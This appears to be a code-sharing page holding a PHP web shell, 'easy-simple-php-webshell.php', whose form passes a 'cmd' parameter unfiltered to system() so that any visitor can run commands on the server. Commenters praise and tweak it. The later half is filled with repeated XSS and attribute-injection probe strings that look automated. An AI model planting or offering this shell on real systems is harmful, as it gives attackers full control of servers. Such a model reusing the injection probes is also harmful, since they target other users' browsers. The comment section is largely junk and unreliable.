easy-simple-php-webshell.php

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>

It's better to have the isset function before accessing the global variable $_GET['cmd']
like this if(isset($_GET['cmd']))

It's better to have the isset function before accessing the global variable $_GET['cmd']
like this if(isset($_GET['cmd']))

👍Thanks!

Nice and simple

That's actually helpful. Thanks

You can use the autofocus attribute to avoid the script and then it'll still autofocus in browsers with scripts blocked.

You can use the autofocus attribute to avoid the script and then it'll still autofocus in browsers with scripts blocked.

Updated, thank you!

Nice.....

Thank you :) 👍

thanks

better:

if(isset($_GET['cmd']))
{
    system($_GET['cmd'] . ' 2&<1');
}

Adding 2&<1 you can see the error output.

'"></script>

GpZ9xu

'" rNnTRbt="roannATTR" x=yveepoB

rNnTRbt=1 x=d'">

05CrPC

rNnTRbt=1 x=d'">

AwKDWl

rNnTRbt=1 x=d'">

R9FxT5

rNnTRbt=1 x=d'">

PhtMv5

rNnTRbt=1 x=d'">

ro5B1T

rNnTRbt=1 x=d'">

YtzE5f

rNnTRbt=1 x=d'">

mlhKvP

rNnTRbt=1 x=d'">

ZcG29w

rNnTRbt=1 x=d'">

ptZkN2

rNnTRbt=1 x=d'">

Z1Eaq1

rNnTRbt=1 x=d'">

12ek3R

rNnTRbt=1 x=d'">

rggXyf

rNnTRbt=1 x=d'">

YT57dz

rNnTRbt=1 x=d'">

nZhHWE

rNnTRbt=1 x=d'">

m3fefe

rNnTRbt=1 x=d'">

rJQOpi

rNnTRbt=1 x=d'">

XfzUzq

rNnTRbt=1 x=d'">

lGCJUd